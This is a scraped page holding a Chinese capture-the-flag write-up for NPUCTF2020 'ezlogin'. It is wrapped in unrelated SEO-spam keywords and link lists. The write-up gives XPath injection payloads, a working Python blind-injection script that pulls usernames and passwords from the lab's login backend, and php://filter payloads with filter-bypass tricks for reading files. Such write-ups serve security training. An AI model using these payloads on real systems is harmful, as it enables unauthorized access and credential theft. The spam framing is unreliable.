当前位置: 首页 > news >正文

长春网站建设国际市场那个app可以看

长春网站建设,国际市场那个app可以看,猎头公司前十名,邯郸营销网站建设公司[NPUCTF2020]ezlogin 打开界面 如果发现自己输入的信息由这样构成#xff0c;可以往xpath注入上靠一下。 不管输入什么#xff0c;很容易发现登陆就超时了#xff0c;说明这里token是不断刷新的。 这样构造也是一样的目的都是为了闭合后面的#xff0c;为啥有两个or呢 us…[NPUCTF2020]ezlogin 打开界面 如果发现自己输入的信息由这样构成可以往xpath注入上靠一下。 不管输入什么很容易发现登陆就超时了说明这里token是不断刷新的。 这样构造也是一样的目的都是为了闭合后面的为啥有两个or呢 username or count(/)1 or 11 and password1 false or true or true and false   ,如果是两个   false or true and false 不就是false了吗 这条命令是判断根目录有几个结点  通过不同的回显这道题采用盲注的手段通过回显位来判断。 一、获取根目录名字 or substring(name(/*[1]), {}, 1){}  or /usernamepassword3123/passwordtoken{}/token 二、获取根目录上面的目录个数 依次类推就可以判断n次目录下面的 子目录 三、获取目录名字的长度 or string-length(name(/*[1]))4 or 这样xpath基本操作就都了解了 id:        or substring(name(/root/accounts/user/*[1]), {}, 1){} or or username:        substring(name(/root/accounts/user/*[2]), {}, 1){} or or password:         substring(name(/root/accounts/user/*[3]), {}, 1){} or import requests import re import time s requests.session() url http://50869d19-fe92-4610-9af0-a294499acdf9.node4.buuoj.cn:81/login.php head {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36,Content-Type: application/xml } find re.compile(input typehidden idtoken value(.*?) /) strs ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 flag for i in range(1,100):for j in strs:r s.post(urlurl)token find.findall(r.text)#猜测根节点名称#payload_1 usernameor substring(name(/*[1]), {}, 1){} or /usernamepassword3123/passwordtoken{}/token.format(i,j,token[0])#猜测子节点名称# payload_2 usernameor substring(name(/root/*[1]), {}, 1){} or /usernamepassword3123/passwordtoken{}/token.format(i,j,token[0])## #猜测accounts的节点# payload_3 usernameor substring(name(/root/accounts/*[1]), {}, 1){} or /usernamepassword3123/passwordtoken{}/token.format(i,j,token[0])## #猜测user节点#payload_4 usernameor substring(name(/root/accounts/user/*[3]), {}, 1){} or /usernamepassword3123/passwordtoken{}/token.format(i,j,token[0])## #跑用户名和密码# payload_username usernameor substring(/root/accounts/user[2]/username/text(), {}, 1){} or /usernamepassword3123/passwordtoken{}/token.format(i,j,token[0])#payload_password usernameor substring(/root/accounts/user[2]/password/text(), {}, 1){} or /usernamepassword3123/passwordtoken{}/token.format(i,j,token[0])#print(payload_password)r s.post(urlurl,headershead,datapayload_password)time.sleep(0.2)print(r.text)if 非法操作 in r.text:flagjprint(flag)breakif 用户名或密码错误! in r.text:breakprint(flag) 一般都是md5存储数据的解密得到  adm1n gtfly123  cf7414b5bdb2e65ee43083f4ddbc4d9f   有的时候会因为网络报错加一个time.sleep就可以了。 进入后发现file可能有路径穿越漏洞或者任意文件读取漏洞 然后下面base64解码得到flag  in /flag 直接用filter读取协议试一下 phP://filter/convert.bAse64-encode/resource/flag PHP://filter/string.toupper/resource/flag   转换为大写都可以绕过
http://www.hkea.cn/news/14279506/

相关文章:

  • 建设银行官方网站登录电脑版2024年的新闻
  • 网站建设绩效考核江苏省和城乡建设门户网站
  • 网站发外链的好处虎年ppt模板免费下载
  • 制作个网站大概多少钱建设工程的在建设部网站
  • 设计相关的网站有哪些内容怎样做同性恋女视频网站
  • asp网站免费辽宁seo推广公司
  • 做彩票游戏网站违法吗网站建设属于哪类税率
  • 高校网站建设工作总结138ip地址查询网站
  • 松江建设机械网站做网站哪家公司比较好而且不贵
  • 模板王字库下载百度seo是啥
  • 昆山快速建设网站方案wordpress邮件失败
  • 传媒公司网站源码php地信网站建设
  • 怎样做免费网站会员有哪些做高考模拟卷的网站
  • 成武建设局网站视频发布播放网站建设
  • iis中怎样配置网站绑定wordpress搬家后重新安装
  • 越南建设部网站做公司官网找谁
  • 外包网站设计哪家好各网站收录
  • 企业建立网站主要包括那些流程网站建设公司 - 百度
  • 软件跟网站开发的区别济南网站建设-中国互联
  • 阿里云网站建设方案书怎么写镇江企业网站排名优化
  • 有源码怎么做网站泉州seo排名扣费
  • 建立一个国外的网站漯河企业网站开发
  • 翔安区建设网站wordpress网站演示
  • 网站header设计公众号取名简单大气
  • 专门做画册的网站电子销售网站报表模块如何做
  • 个人备案域名可以做哪些网站wordpress图片文字
  • 建设一个最普通网站要多少钱wordpress 页面布局
  • 运营网站需要什么条件网站建设具体项目及价格
  • 农村电商扶贫网站建设标书制作是干啥的
  • 南山做网站公司怎么选择东莞网页建设网站